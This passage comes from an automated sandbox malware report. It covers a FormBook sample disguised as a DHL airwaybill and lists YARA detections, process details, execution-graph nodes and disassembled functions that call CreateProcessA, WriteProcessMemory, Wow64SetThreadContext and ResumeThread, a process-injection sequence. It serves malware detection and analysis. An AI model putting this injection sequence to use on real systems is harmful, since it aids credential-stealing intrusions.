              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              Reputation:moderate
              Has exited:false

              General

              Target ID:10
              Start time:03:05:02
              Start date:06/09/2024
              Path:C:\Program Files\Mozilla Firefox\firefox.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
              Imagebase:0x7ff728280000
              File size:676'768 bytes
              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:9.2%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:1.6%
                Total number of Nodes:252
                Total number of Limit Nodes:16
                execution_graph 50398 6b29502 50403 6b29d80 50398->50403 50419 6b29de6 50398->50419 50436 6b29d70 50398->50436 50399 6b29520 50404 6b29d9a 50403->50404 50452 6b2a6f3 50404->50452 50456 6b2a0a9 50404->50456 50462 6b2a8ab 50404->50462 50467 6b2a584 50404->50467 50471 6b2a926 50404->50471 50477 6b2a461 50404->50477 50482 6b2a360 50404->50482 50487 6b2a842 50404->50487 50491 6b2a4bd 50404->50491 50496 6b2a7f9 50404->50496 50500 6b2a318 50404->50500 50505 6b2a3f7 50404->50505 50510 6b2a431 50404->50510 50405 6b29da2 50405->50399 50420 6b29d74 50419->50420 50422 6b29de9 50419->50422 50423 6b2a6f3 2 API calls 50420->50423 50424 6b2a431 4 API calls 50420->50424 50425 6b2a3f7 2 API calls 50420->50425 50426 6b2a318 2 API calls 50420->50426 50427 6b2a7f9 2 API calls 50420->50427 50428 6b2a4bd 2 API calls 50420->50428 50429 6b2a842 2 API calls 50420->50429 50430 6b2a360 2 API calls 50420->50430 50431 6b2a461 2 API calls 50420->50431 50432 6b2a926 2 API calls 50420->50432 50433 6b2a584 2 API calls 50420->50433 50434 6b2a8ab 2 API calls 50420->50434 50435 6b2a0a9 2 API calls 50420->50435 50421 6b29da2 50421->50399 50423->50421 50424->50421 50425->50421 50426->50421 50427->50421 50428->50421 50429->50421 50430->50421 50431->50421 50432->50421 50433->50421 50434->50421 50435->50421 50437 6b29d71 50436->50437 50439 6b2a6f3 2 API calls 50437->50439 50440 6b2a431 4 API calls 50437->50440 50441 6b2a3f7 2 API calls 50437->50441 50442 6b2a318 2 API calls 50437->50442 50443 6b2a7f9 2 API calls 50437->50443 50444 6b2a4bd 2 API calls 50437->50444 50445 6b2a842 2 API calls 50437->50445 50446 6b2a360 2 API calls 50437->50446 50447 6b2a461 2 API calls 50437->50447 50448 6b2a926 2 API calls 50437->50448 50449 6b2a584 2 API calls 50437->50449 50450 6b2a8ab 2 API calls 50437->50450 50451 6b2a0a9 2 API calls 50437->50451 50438 6b29da2 50438->50399 50439->50438 50440->50438 50441->50438 50442->50438 50443->50438 50444->50438 50445->50438 50446->50438 50447->50438 50448->50438 50449->50438 50450->50438 50451->50438 50519 6b28cf0 50452->50519 50523 6b28ce8 50452->50523 50453 6b2a717 50458 6b2a0e3 50456->50458 50457 6b2a247 50457->50405 50458->50457 50527 6b28f78 50458->50527 50531 6b28f6c 50458->50531 50459 6b2a2d4 50459->50405 50463 6b2a8b1 50462->50463 50535 6b28670 50463->50535 50539 6b28668 50463->50539 50464 6b2a8de 50543 6b28c30 50467->50543 50547 6b28c28 50467->50547 50468 6b2a5ab 50468->50405 50472 6b2a5fb 50471->50472 50474 6b2ab4e 50472->50474 50475 6b28670 ResumeThread 50472->50475 50476 6b28668 ResumeThread 50472->50476 50473 6b2a8de 50474->50405 50475->50473 50476->50473 50478 6b2a467 50477->50478 50480 6b28cf0 WriteProcessMemory 50478->50480 50481 6b28ce8 WriteProcessMemory 50478->50481 50479 6b2aaa3 50480->50479 50481->50479 50483 6b2a384 50482->50483 50485 6b28cf0 WriteProcessMemory 50483->50485 50486 6b28ce8 WriteProcessMemory 50483->50486 50484 6b2a2ff 50484->50405 50485->50484 50486->50484 50551 6b28de0 50487->50551 50555 6b28dd9 50487->50555 50488 6b2a864 50492 6b2a4ca 50491->50492 50494 6b28670 ResumeThread 50492->50494 50495 6b28668 ResumeThread 50492->50495 50493 6b2a8de 50494->50493 50495->50493 50559 6b28720 50496->50559 50563 6b28718 50496->50563 50497 6b2a639 50497->50405 50501 6b2a8c9 50500->50501 50503 6b28670 ResumeThread 50501->50503 50504 6b28668 ResumeThread 50501->50504 50502 6b2a8de 50503->50502 50504->50502 50506 6b2a416 50505->50506 50508 6b28670 ResumeThread 50506->50508 50509 6b28668 ResumeThread 50506->50509 50507 6b2a8de 50508->50507 50509->50507 50511 6b2a784 50510->50511 50515 6b28720 Wow64SetThreadContext 50511->50515 50516 6b28718 Wow64SetThreadContext 50511->50516 50512 6b2a416 50513 6b2abe5 50512->50513 50517 6b28670 ResumeThread 50512->50517 50518 6b28668 ResumeThread 50512->50518 50513->50405 50514 6b2a8de 50515->50512 50516->50512 50517->50514 50518->50514 50520 6b28d38 WriteProcessMemory 50519->50520 50522 6b28d8f 50520->50522 50522->50453 50524 6b28cf0 WriteProcessMemory 50523->50524 50526 6b28d8f 50524->50526 50526->50453 50528 6b29001 50527->50528 50528->50528 50529 6b29166 CreateProcessA 50528->50529 50530 6b291c3 50529->50530 50530->50530 50532 6b28f78 50531->50532 50532->50532 50533 6b29166 CreateProcessA 50532->50533 50534 6b291c3 50533->50534 50534->50534 50536 6b286b0 ResumeThread 50535->50536 50538 6b286e1 50536->50538 50538->50464 50540 6b28670 ResumeThread 50539->50540 50542 6b286e1 50540->50542 50542->50464 50544 6b28c70 VirtualAllocEx 50543->50544 50546 6b28cad 50544->50546 50546->50468 50548 6b28c30 VirtualAllocEx 50547->50548 50550 6b28cad 50548->50550 50550->50468 50552 6b28e2b ReadProcessMemory 50551->50552 50554 6b28e6f 50552->50554 50554->50488 50556 6b28de0 ReadProcessMemory 50555->50556 50558 6b28e6f 50556->50558 50558->50488 50560 6b28765 Wow64SetThreadContext 50559->50560 50562 6b287ad 50560->50562 50562->50497 50564 6b28765 Wow64SetThreadContext 50563->50564 50566 6b287ad 50564->50566 50566->50497 50567 c1abf0 50568 c1abff 50567->50568 50571 c1acd8 50567->50571 50579 c1ace8 50567->50579 50572 c1acdc 50571->50572 50573 c1ac80 50572->50573 50587 c1af80 50572->50587 50591 c1af70 50572->50591 50573->50568 50574 c1ad14 50574->50573 50575 c1af20 GetModuleHandleW 50574->50575 50576 c1af4d 50575->50576 50576->50568 50580 c1acf9 50579->50580 50581 c1ad1c 50579->50581 50580->50581 50585 c1af80 LoadLibraryExW 50580->50585 50586 c1af70 LoadLibraryExW 50580->50586 50581->50568 50582 c1ad14 50582->50581 50583 c1af20 GetModuleHandleW 50582->50583 50584 c1af4d 50583->50584 50584->50568 50585->50582 50586->50582 50588 c1af94 50587->50588 50589 c1afb9 50588->50589 50595 c1a0a8 50588->50595 50589->50574 50592 c1af74 50591->50592 50593 c1afb9 50592->50593 50594 c1a0a8 LoadLibraryExW 50592->50594 50593->50574 50594->50593 50596 c1b160 LoadLibraryExW 50595->50596 50598 c1b1d9 50596->50598 50598->50589 50599 6b2af40 50600 6b2b0cb 50599->50600 50602 6b2af66 50599->50602 50602->50600 50603 6b27560 50602->50603 50604 6b2b1c0 PostMessageW 50603->50604 50605 6b2b22c 50604->50605 50605->50602 50343 2794050 50344 2794092 50343->50344 50346 2794099 50343->50346 50345 27940ea CallWindowProcW 50344->50345 50344->50346 50345->50346 50347 279a2d0 50348 279a2f8 50347->50348 50350 279a3aa 50347->50350 50354 4d50b39 50348->50354 50367 4d501d0 50348->50367 50372 4d50bda 50348->50372 50349 279a33d 50355 4d50b3c 50354->50355 50357 4d50a04 50355->50357 50364 4d50b46 50355->50364 50356 4d50a24 50356->50349 50357->50356 50358 4d50a67 50357->50358 50362 4d50a87 50357->50362 50383 4d501c0 DrawTextExW 50358->50383 50360 4d50a6c 50360->50349 50361 4d50c76 50361->50349 50362->50356 50384 4d501c0 DrawTextExW 50362->50384 50364->50361 50377 4d50358 50364->50377 50366 4d50ce1 50369 4d501db 50367->50369 50368 4d50c76 50368->50349 50369->50368 50370 4d50358 DrawTextExW 50369->50370 50371 4d50ce1 50370->50371 50374 4d50be6 50372->50374 50373 4d50c76 50373->50349 50374->50373 50375 4d50358 DrawTextExW 50374->50375 50376 4d50ce1 50375->50376 50378 4d50363 50377->50378 50379 4d52cb9 50378->50379 50385 4d53817 50378->50385 50390 4d53828 50378->50390 50379->50366 50380 4d52dcc 50380->50366 50383->50360 50384->50356 50386 4d5381c 50385->50386 50387 4d537f0 50386->50387 50394 4d5248c 50386->50394 50387->50380 50391 4d5382a 50390->50391 50392 4d5248c DrawTextExW 50391->50392 50393 4d53845 50392->50393 50393->50380 50395 4d53860 DrawTextExW 50394->50395 50397 4d53845 50395->50397 50397->50380 50606 c1d378 50607 c1d3be 50606->50607 50611 c1d548 50607->50611 50615 c1d558 50607->50615 50608 c1d4ab 50612 c1d54c 50611->50612 50619 c1b6d0 50612->50619 50616 c1d55a 50615->50616 50617 c1b6d0 DuplicateHandle 50616->50617 50618 c1d586 50617->50618 50618->50608 50620 c1d5c0 DuplicateHandle 50619->50620 50621 c1d586 50620->50621 50621->50608 50301 6b2bab8 50302 6b2bad3 50301->50302 50304 6b2b6a4 50301->50304 50305 6b2b6af 50304->50305 50307 6b2bb17 50305->50307 50308 6b2b6b4 50305->50308 50307->50302 50309 6b2b6bf 50308->50309 50310 6b2bd3f 50309->50310 50313 4d53960 50309->50313 50319 4d53953 50309->50319 50310->50307 50314 4d53962 50313->50314 50315 4d539a9 50314->50315 50325 6b2bd60 50314->50325 50330 6b2bd98 50314->50330 50335 6b2bd50 50314->50335 50315->50310 50321 4d5395c 50319->50321 50320 4d539a9 50320->50310 50321->50320 50322 6b2bd60 FindCloseChangeNotification 50321->50322 50323 6b2bd50 FindCloseChangeNotification 50321->50323 50324 6b2bd98 FindCloseChangeNotification 50321->50324 50322->50320 50323->50320 50324->50320 50326 6b2bd4f 50325->50326 50326->50325 50329 6b2bda8 50326->50329 50340 6b2b6d4 50326->50340 50329->50315 50331 6b2bd4f 50330->50331 50332 6b2b6d4 FindCloseChangeNotification 50331->50332 50334 6b2bda8 50331->50334 50333 6b2bd89 50332->50333 50333->50315 50334->50315 50336 6b2bd4f 50335->50336 50337 6b2b6d4 FindCloseChangeNotification 50336->50337 50339 6b2bda8 50336->50339 50338 6b2bd89 50337->50338 50338->50315 50339->50315 50341 6b2bed8 FindCloseChangeNotification 50340->50341 50342 6b2bd89 50341->50342 50342->50315

                Executed Functions

                Function 02797220 Relevance: 20.2, Strings: 15, Instructions: 1401COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 2797220-2797242 2 2797244-2797266 0->2 3 2797267-279727a 0->3 6 279727c-279727d 3->6 7 279727e 3->7 6->7 9 2797280-2797281 7->9 10 2797282-279743f call 2796f40 * 2 call 2796f50 * 2 call 2796f60 * 2 call 2796f70 call 2796f60 * 2 call 2796f80 7->10 9->10 57 2797445-2797454 call 2796f90 10->57 58 2797544-27977f8 call 2796f60 * 2 call 2796fb0 call 2796fc0 call 2796fd0 call 2796fe0 call 2796fb0 call 2796fc0 call 2796fd0 call 2796fe0 10->58 62 279745a-27974d2 call 2796fa0 57->62 63 279752d-279753e call 2796f80 57->63 118 27977fe-279786f call 2796ff0 58->118 119 27987a4-27987b2 58->119 84 27974d4-27974e5 62->84 85 27974e7-27974f9 62->85 63->57 63->58 88 2797512-2797527 call 2796f90 84->88 87 27974fb-2797507 85->87 85->88 87->88 88->62 88->63 141 2797875-27987a3 call 2797000 call 2796fb0 call 2796fc0 call 2796fd0 call 2796fe0 call 2797010 call 2797000 call 2796fb0 call 2796fc0 call 2796fd0 call 2796fe0 call 2796fb0 call 2796fc0 call 2796fd0 call 2796fe0 call 2797020 call 2797030 call 2796fb0 call 2796fc0 call 2796fd0 call 2796fe0 call 2797020 call 2797030 call 2797040 call 2797000 call 2796fb0 call 2796fc0 call 2796fd0 call 2796fe0 call 2797050 call 2796fb0 call 2796fc0 call 2796fd0 call 2796fe0 call 2797020 call 2797030 call 2796fb0 call 2796fc0 call 2796fd0 call 2796fe0 call 2797020 call 2797030 call 2796fb0 call 2796fc0 call 2796fd0 call 2796fe0 call 2797020 call 2797030 call 2796fb0 call 2796fc0 call 2796fd0 call 2796fe0 call 2797020 call 2797030 call 2797060 call 2797070 call 2797080 call 2797090 * 11 call 27970a0 call 27970b0 call 2796fc0 call 27954e4 * 2 call 27970c0 118->141 122 27987b4 119->122 123 27987b6-27987b9 119->123 122->123 125 27987bb-27987c9 123->125 126 2798833-2798848 123->126 360 27987ce call c15cd4 125->360 361 27987ce call c18248 125->361 128 2798852-2798893 call 27970e0 126->128 132 27987d3-2798848 call 27970d0 132->128 360->132 361->132
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2154197406.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2790000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: $ $$$$$'$2$6$6$;$;$;$T$T$T$$q
                • API String ID: 0-3505707904
                • Opcode ID: 03ba8cc2d12f0b1399beaf84ee98a9e53ddf968053340ef70108d1cfcec93de3
                • Instruction ID: fd6a4a8da2a4ef49a0903b4432930d26dc364677ad5f2c9538fcfd169db6bc26
                • Opcode Fuzzy Hash: 03ba8cc2d12f0b1399beaf84ee98a9e53ddf968053340ef70108d1cfcec93de3
                • Instruction Fuzzy Hash: 93D25B31A10719CFCB15EF78C894B99B7B2BF8A300F1186A9D8096F355EB75A985CF40
                Function 06B26CF0 Relevance: .4, Instructions: 365COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 20c37eddc0893af0aa82170f33a6774e42c38229756a02b370137010525b9fcb
                • Instruction ID: fe28a57e2fc1140262907c62bcac6f7aee175b7ae2a52deae5a4575bb607533c
                • Opcode Fuzzy Hash: 20c37eddc0893af0aa82170f33a6774e42c38229756a02b370137010525b9fcb
                • Instruction Fuzzy Hash: CAE15D75A00209DFDF45EBA8D854BAEBBB2FF89300F1080A5E509AB355DB39AD41CF51
                Function 06B2A0A9 Relevance: .2, Instructions: 193COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5f25a3a374a22c8598d031e5a8dd1320905e2a8c8e8fd76db8852f419cfcc90e
                • Instruction ID: eb361398acf6286c35309da4f0a718a3dd7f5499fcc437e3d6fe0019cbcef6cc
                • Opcode Fuzzy Hash: 5f25a3a374a22c8598d031e5a8dd1320905e2a8c8e8fd76db8852f419cfcc90e
                • Instruction Fuzzy Hash: 8481E4B1E446298FEB68CF66C8407E9B7F6BF89300F14D1EAD40DA6254EB745A85CF40
                Function 06B22191 Relevance: .2, Instructions: 158COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1a480146a228bc1fd254f91ef37613f97274c048785da6802e96ad5ae135b493
                • Instruction ID: 0a9f9ed572c17aa709183161ab7fb86016b8dbca2e04d02891e1ab0363318161
                • Opcode Fuzzy Hash: 1a480146a228bc1fd254f91ef37613f97274c048785da6802e96ad5ae135b493
                • Instruction Fuzzy Hash: 4451F3B4E14219CFDB48CFE9C840AAEBBF6FF89300F108169D919AB354DB355A46CB50
                Function 06B231FF Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b02ecde9a6fb6ccf8812b288503d18a22f279146d87e0f6454059c65b84d03af
                • Instruction ID: 14dbb8223dac42b58f0483103b23f30998de8bbf8abfeadf4f491a7449b1f068
                • Opcode Fuzzy Hash: b02ecde9a6fb6ccf8812b288503d18a22f279146d87e0f6454059c65b84d03af
                • Instruction Fuzzy Hash: 4111D7B1D006588BEB58CF67D8547DEBBF6AFC8310F14C469980D66264DB3509468F90
                Function 06B28F6C Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 387 6b28f6c-6b2900d 390 6b29046-6b29066 387->390 391 6b2900f-6b29019 387->391 398 6b29068-6b29072 390->398 399 6b2909f-6b290ce 390->399 391->390 392 6b2901b-6b2901d 391->392 393 6b29040-6b29043 392->393 394 6b2901f-6b29029 392->394 393->390 396 6b2902b 394->396 397 6b2902d-6b2903c 394->397 396->397 397->397 400 6b2903e 397->400 398->399 401 6b29074-6b29076 398->401 405 6b290d0-6b290da 399->405 406 6b29107-6b291c1 CreateProcessA 399->406 400->393 403 6b29078-6b29082 401->403 404 6b29099-6b2909c 401->404 407 6b29086-6b29095 403->407 408 6b29084 403->408 404->399 405->406 409 6b290dc-6b290de 405->409 419 6b291c3-6b291c9 406->419 420 6b291ca-6b29250 406->420 407->407 410 6b29097 407->410 408->407 411 6b290e0-6b290ea 409->411 412 6b29101-6b29104 409->412 410->404 414 6b290ee-6b290fd 411->414 415 6b290ec 411->415 412->406 414->414 416 6b290ff 414->416 415->414 416->412 419->420 430 6b29252-6b29256 420->430 431 6b29260-6b29264 420->431 430->431 432 6b29258 430->432 433 6b29266-6b2926a 431->433 434 6b29274-6b29278 431->434 432->431 433->434 435 6b2926c 433->435 436 6b2927a-6b2927e 434->436 437 6b29288-6b2928c 434->437 435->434 436->437 438 6b29280 436->438 439 6b2929e-6b292a5 437->439 440 6b2928e-6b29294 437->440 438->437 441 6b292a7-6b292b6 439->441 442 6b292bc 439->442 440->439 441->442 444 6b292bd 442->444 444->444
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B291AE
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: fe078f2f76b8da0636dbd7c2ba75198a98be92a9b3a64bb6ce1cc3fcd801ecd8
                • Instruction ID: 57839cce630c7d9131425db75d3c56ed8a7075d1b7cb6d6bb81f9477cd4c0277
                • Opcode Fuzzy Hash: fe078f2f76b8da0636dbd7c2ba75198a98be92a9b3a64bb6ce1cc3fcd801ecd8
                • Instruction Fuzzy Hash: B2A14AB1D0022A9FEB50DFA9C8417DEBBF2FF49300F1485A9E819A7240DB759985CF91
                Function 06B28F78 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 445 6b28f78-6b2900d 447 6b29046-6b29066 445->447 448 6b2900f-6b29019 445->448 455 6b29068-6b29072 447->455 456 6b2909f-6b290ce 447->456 448->447 449 6b2901b-6b2901d 448->449 450 6b29040-6b29043 449->450 451 6b2901f-6b29029 449->451 450->447 453 6b2902b 451->453 454 6b2902d-6b2903c 451->454 453->454 454->454 457 6b2903e 454->457 455->456 458 6b29074-6b29076 455->458 462 6b290d0-6b290da 456->462 463 6b29107-6b291c1 CreateProcessA 456->463 457->450 460 6b29078-6b29082 458->460 461 6b29099-6b2909c 458->461 464 6b29086-6b29095 460->464 465 6b29084 460->465 461->456 462->463 466 6b290dc-6b290de 462->466 476 6b291c3-6b291c9 463->476 477 6b291ca-6b29250 463->477 464->464 467 6b29097 464->467 465->464 468 6b290e0-6b290ea 466->468 469 6b29101-6b29104 466->469 467->461 471 6b290ee-6b290fd 468->471 472 6b290ec 468->472 469->463 471->471 473 6b290ff 471->473 472->471 473->469 476->477 487 6b29252-6b29256 477->487 488 6b29260-6b29264 477->488 487->488 489 6b29258 487->489 490 6b29266-6b2926a 488->490 491 6b29274-6b29278 488->491 489->488 490->491 492 6b2926c 490->492 493 6b2927a-6b2927e 491->493 494 6b29288-6b2928c 491->494 492->491 493->494 495 6b29280 493->495 496 6b2929e-6b292a5 494->496 497 6b2928e-6b29294 494->497 495->494 498 6b292a7-6b292b6 496->498 499 6b292bc 496->499 497->496 498->499 501 6b292bd 499->501 501->501
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B291AE
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 0ab986f1e13feb3ad4568c304748b62049f3ae7f445aa94bd01059bd72dae429
                • Instruction ID: f7a1430e9403eb4fc9fb7e17a5f49f2d6026e8cfc384ff9255cfcabde19c1a2a
                • Opcode Fuzzy Hash: 0ab986f1e13feb3ad4568c304748b62049f3ae7f445aa94bd01059bd72dae429
                • Instruction Fuzzy Hash: B89149B1D0022A9FEB50DFA9C8417DEBBF2FF49300F1485A9E818A7240DB759985CF91
                Function 00C1ACE8 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 502 c1ace8-c1acf7 503 c1ad23-c1ad27 502->503 504 c1acf9-c1ad06 call c19314 502->504 505 c1ad29-c1ad33 503->505 506 c1ad3b-c1ad7c 503->506 511 c1ad08 504->511 512 c1ad1c 504->512 505->506 513 c1ad89-c1ad97 506->513 514 c1ad7e-c1ad86 506->514 562 c1ad0e call c1af80 511->562 563 c1ad0e call c1af70 511->563 512->503 516 c1ad99-c1ad9e 513->516 517 c1adbb-c1adbd 513->517 514->513 515 c1ad14-c1ad16 515->512 518 c1ae58-c1aed2 515->518 520 c1ada0-c1ada7 call c1a050 516->520 521 c1ada9 516->521 519 c1adc0-c1adc7 517->519 552 c1aed4 518->552 553 c1aed6 518->553 522 c1add4-c1addb 519->522 523 c1adc9-c1add1 519->523 524 c1adab-c1adb9 520->524 521->524 527 c1ade8-c1adf1 call c1a060 522->527 528 c1addd-c1ade5 522->528 523->522 524->519 533 c1adf3-c1adfb 527->533 534 c1adfe-c1ae03 527->534 528->527 533->534 536 c1ae21-c1ae25 534->536 537 c1ae05-c1ae0c 534->537 540 c1ae2b-c1ae2e 536->540 537->536 538 c1ae0e-c1ae1e call c1a070 call c1a080 537->538 538->536 542 c1ae51-c1ae57 540->542 543 c1ae30-c1ae4e 540->543 543->542 552->553 554 c1af00-c1af18 552->554 555 c1aed8-c1aed9 553->555 556 c1aeda-c1aefe 553->556 557 c1af20-c1af4b GetModuleHandleW 554->557 558 c1af1a-c1af1d 554->558 555->556 556->554 559 c1af54-c1af68 557->559 560 c1af4d-c1af53 557->560 558->557 560->559 562->515 563->515
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 00C1AF3E
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 1a66d6cb4897af05fa2c7eac4f64d71d47e99fb534d45c06165b64a85e2fffee
                • Instruction ID: 0d023a9db9bf612d33c05136a0cf2087f74ff86eff1b2edfc43119772ddb03dd
                • Opcode Fuzzy Hash: 1a66d6cb4897af05fa2c7eac4f64d71d47e99fb534d45c06165b64a85e2fffee
                • Instruction Fuzzy Hash: 93816970A01B058FDB24DF69D44179ABBF1FF89304F00892ED05ADBA51D734E98ADB92
                Function 00C15A64 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 564 c15a64-c15af4
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d7b5caff25d553136678689557b83cb644004d7a3b486577affc29dcea7c596
                • Instruction ID: 0252c367b4dac219638778354b643b269202aecc99455423db0e87deef292d73
                • Opcode Fuzzy Hash: 2d7b5caff25d553136678689557b83cb644004d7a3b486577affc29dcea7c596
                • Instruction Fuzzy Hash: 8C41CE71805B48CFDB10DFA8C4847EDBBB0EF97324F24418AC055AB255C735998AEB12
                Function 00C158ED Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 567 c158ed-c158ee 568 c158f0-c158f1 567->568 569 c158f2 567->569 568->569 570 c158f4-c158f5 569->570 571 c158f6-c1596c 569->571 570->571 573 c1596f-c159b9 CreateActCtxA 571->573 575 c159c2-c15a1c 573->575 576 c159bb-c159c1 573->576 583 c15a2b-c15a2f 575->583 584 c15a1e-c15a21 575->584 576->575 585 c15a31-c15a3d 583->585 586 c15a40 583->586 584->583 585->586 588 c15a41 586->588 588->588
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 00C159A9
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: e0378717bec59520c862750e1370400cbc923e50b2dc903a935f9829b440576e
                • Instruction ID: 0549330c96169583f045fd352c64f930a68efced3c14b6e20e6ecde543050bef
                • Opcode Fuzzy Hash: e0378717bec59520c862750e1370400cbc923e50b2dc903a935f9829b440576e
                • Instruction Fuzzy Hash: C0410470C00719CBEB14CFA9C8847DDBBB5BF89704F20816AD409AB251DB755945CF91
                Function 00C144F0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 589 c144f0-c159b9 CreateActCtxA 593 c159c2-c15a1c 589->593 594 c159bb-c159c1 589->594 601 c15a2b-c15a2f 593->601 602 c15a1e-c15a21 593->602 594->593 603 c15a31-c15a3d 601->603 604 c15a40 601->604 602->601 603->604 606 c15a41 604->606 606->606
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 00C159A9
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: c8e26da5aaf3c3b9db38a5a890117f095d25dae8a03a5402fdffa567888ce084
                • Instruction ID: 16964c51a1fdfc865214e09f7f4e1613ee61ee7084e34abb06b21d3c31a5a692
                • Opcode Fuzzy Hash: c8e26da5aaf3c3b9db38a5a890117f095d25dae8a03a5402fdffa567888ce084
                • Instruction Fuzzy Hash: 5741E3B0C0071DCBEB24DFA9C8447DEBBB5BF89704F20816AD418AB251DB756949CF91
                Function 02794050 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 607 2794050-279408c 608 279413c-279415c 607->608 609 2794092-2794097 607->609 615 279415f-279416c 608->615 610 2794099-27940d0 609->610 611 27940ea-2794122 CallWindowProcW 609->611 618 27940d9-27940e8 610->618 619 27940d2-27940d8 610->619 612 279412b-279413a 611->612 613 2794124-279412a 611->613 612->615 613->612 618->615 619->618
                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 02794111
                Memory Dump Source
